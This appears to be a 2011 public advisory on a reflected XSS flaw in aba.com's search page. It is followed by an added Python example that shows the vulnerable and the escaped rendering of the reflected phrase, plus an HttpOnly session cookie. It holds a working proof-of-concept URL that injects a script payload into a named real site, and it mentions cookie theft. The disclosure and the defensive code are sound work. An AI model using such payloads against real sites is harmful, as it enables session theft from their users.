American Bankers Association suffers from a cross site scripting vulnerability.
24ae71d450be9e69d7651aabe878550e6e3085eea66e94aa964692fd1b4d2fba
########################################################
| Title : American Bankers Association(aba.com) XSS
| Author : Codeine
| Email : f3codeine[at]yahoo[dot]com
| Site : http://infosecforums.com/
| Date : 08/09/2011
| Cat : PHP[XSS]
| URL : http://aba.com/
########################################################
American Bankers Association uses a search script provided by "xSynthesis Search". After checking, no current version by them is vulnerable.
Since aba.com allows users to log in, this vulnerability presents a great security risk regarding cookie logging.
This is not persistent but still provides an area of risk.
[*]XSS Vulnerability
http://www.aba.com/Search2/searchaba.aspx?xr=t&adv=t&PageSize=10&MaxPages=200&SearchKind=ExactPhrase&SearchPhrase=%3Cscript%3Ealert%28%27CodeineXSS%27%29%3B%3C%2Fscript%3E
I used <script>alert('CodeineXSS');</script>; it works in all of the input fields.
______________________________________________________________________________________
Greetz Hidden Ninja
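
Added example, not part of the original advisory and not xSynthesis Search or aba.com code: the reflected search phrase rendered without and with HTML encoding, plus a session cookie flagged HttpOnly to limit the cookie-theft risk noted above. The function names, the page markup and the cookie name are assumptions made for illustration.

```python
# Added example: reflected-XSS "before and after" for a search results page.
# The handlers are hypothetical; they are not xSynthesis Search or aba.com code.
import html
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlsplit

# Path and query string from the advisory's proof-of-concept URL (alert box only).
POC_URL = ("/Search2/searchaba.aspx?xr=t&adv=t&PageSize=10&MaxPages=200"
           "&SearchKind=ExactPhrase&SearchPhrase="
           "%3Cscript%3Ealert%28%27CodeineXSS%27%29%3B%3C%2Fscript%3E")


def search_phrase(url):
    """Return the decoded SearchPhrase parameter, as a web framework would."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("SearchPhrase", [""])[0]


def render_unsafe(phrase):
    """Vulnerable pattern: user input concatenated into HTML unchanged."""
    return ('<p>Results for: ' + phrase + '</p>'
            '<input name="SearchPhrase" value="' + phrase + '">')


def render_safe(phrase):
    """Hardened pattern: HTML-encode for both text and attribute contexts."""
    encoded = html.escape(phrase, quote=True)  # escapes & < > " '
    return ('<p>Results for: ' + encoded + '</p>'
            '<input name="SearchPhrase" value="' + encoded + '">')


def session_cookie_header(session_id):
    """Session cookie that page script cannot read (limits cookie theft)."""
    cookie = SimpleCookie()
    cookie["session"] = session_id  # cookie name is an assumption
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["path"] = "/"
    return cookie["session"].OutputString()


if __name__ == "__main__":
    phrase = search_phrase(POC_URL)
    print(render_unsafe(phrase))   # markup contains a live <script> element
    print(render_safe(phrase))     # payload rendered as inert text
    print(session_cookie_header("constructed-sample-id"))
```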